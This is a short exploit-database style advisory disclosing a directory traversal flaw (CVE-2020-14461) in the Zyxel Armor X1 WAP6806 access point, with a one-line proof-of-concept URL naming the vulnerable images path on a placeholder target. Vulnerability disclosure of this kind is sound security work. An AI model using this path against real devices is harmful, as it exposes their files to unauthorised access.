21 lines
No EOL
709 B
Text
21 lines
No EOL
709 B
Text
# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
|
|
# Date: 2020-06-19
|
|
# Exploit Author: Rajivarnan R
|
|
# Vendor Homepage: https://www.zyxel.com/
|
|
# Software [http://www.zyxelguard.com/WAP6806.asp]
|
|
# Version: [V1.00(ABAL.6)C0]
|
|
# CVE: 2020-14461
|
|
# Tested on: Linux Mint / Windows 10
|
|
# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]
|
|
|
|
# As a result of the research, one vulnerability identified.
|
|
# (Directory Traversal)
|
|
# Technical information is provided below step by step.
|
|
|
|
# [1] - Directory Traversal Vulnerability
|
|
|
|
# Vulnerable Parameter Type: GET
|
|
# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]
|
|
|
|
# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/
|
|
<https://target/Zyxel/images/eaZy/> |